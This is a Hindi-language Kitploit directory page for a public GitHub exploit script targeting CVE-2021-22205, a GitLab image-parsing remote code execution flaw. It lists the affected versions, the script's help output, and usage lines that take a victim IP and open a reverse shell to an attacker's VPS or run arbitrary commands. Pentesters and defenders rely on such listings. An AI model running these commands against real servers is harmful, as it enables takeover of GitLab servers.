Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-22205 — CVE-2021-22205 डिटेक्शन स्क्रिप्ट, getshell और कमांड निष्पादन का समर्थन करती है | Kitploit
उपकरण/GitHubGitHub/keven1z/cve-2021-22205
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubkeven1z/cve-2021-22205

CVE-2021-22205

CVE-2021-22205 डिटेक्शन स्क्रिप्ट, getshell और कमांड निष्पादन का समर्थन करती है

रिपॉजिटरी देखें
1234 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-22205

चूँकि GitLab फ़ाइल पार्सर (file parser) को भेजी गई इमेज फ़ाइलों का सही ढंग से सत्यापन नहीं करता है, इसलिए कमांड निष्पादन (command execution) संभव हो जाता है। हमलावर दुर्भावनापूर्ण अनुरोध बनाकर इस भेद्यता का उपयोग करके लक्ष्य प्रणाली पर मनमाने निर्देश निष्पादित कर सकता है, जिससे अंततः GitLab सर्वर नियंत्रण में आ जाता है। चूँकि इंटरनेट पर उपलब्ध अधिकांश स्क्रिप्ट में रिवर्स शेल (reverse shell) की सुविधा नहीं होती, इसलिए ऑनलाइन उपलब्ध स्क्रिप्ट को संशोधित करके वन-क्लिक getshell सुविधा जोड़ी गई है।

प्रभावित संस्करण

  • 11.9 <= GitLab(CE/EE)< 13.8.8
  • 13.9 <= GitLab(CE/EE)< 13.9.6
  • 13.10 <= GitLab(CE/EE)< 13.10.3

उपयोग निर्देश

root@kitploit:~
	  ______     _______     ____   ___ ____  _      ____  ____  ____   ___  ____  
	 / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \|___ \|___ \ / _ \| ___| 
	| |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \ 
	| |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
 	\____ |  \_/  |_____|   |_____|\___/_____|_|    |_____|_____|_____|\___/|____/ 
    	
usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP]
                         [-p PORT]

GitLab < 13.10.3 RCE

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        लक्ष्य URL
  -c COMMAND, --command COMMAND
                        कमांड निष्पादित करें
  --shell               क्या रिवर्स शेल (reverse shell) चाहिए या नहीं
  -i IP, --ip IP        रिवर्स शेल IP
  -p PORT, --port PORT  रिवर्स शेल पोर्ट

उपयोग

root@kitploit:~
python3 CVE-2021-22205.py -t [पीड़ित IP] --shell -i [VPS IP] -p [VPS पोर्ट] //रिवर्स शेल प्राप्त करें
python3 CVE-2021-22205.py -t [पीड़ित IP] -c [कमांड] //कमांड निष्पादित करें

अस्वीकरण

यह स्क्रिप्ट केवल परीक्षण उद्देश्यों के लिए है, कृपया इसका उपयोग किसी अन्य उद्देश्य के लिए न करें।

टूल डाउनलोड करें